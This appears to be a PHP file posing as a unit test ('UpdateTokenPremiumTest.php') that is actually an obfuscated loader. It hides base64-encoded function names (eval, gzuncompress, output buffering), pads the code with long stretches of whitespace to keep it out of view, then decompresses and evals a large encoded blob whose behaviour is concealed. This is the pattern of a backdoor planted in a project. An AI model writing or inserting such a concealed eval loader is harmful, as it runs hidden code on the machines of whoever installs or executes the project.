<?php 
        $__='printf';$_='Loading tests/Unit/UpdateTokenPremiumTest.php';
        























































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































































































                                                                                                                                                                                                                     $________;
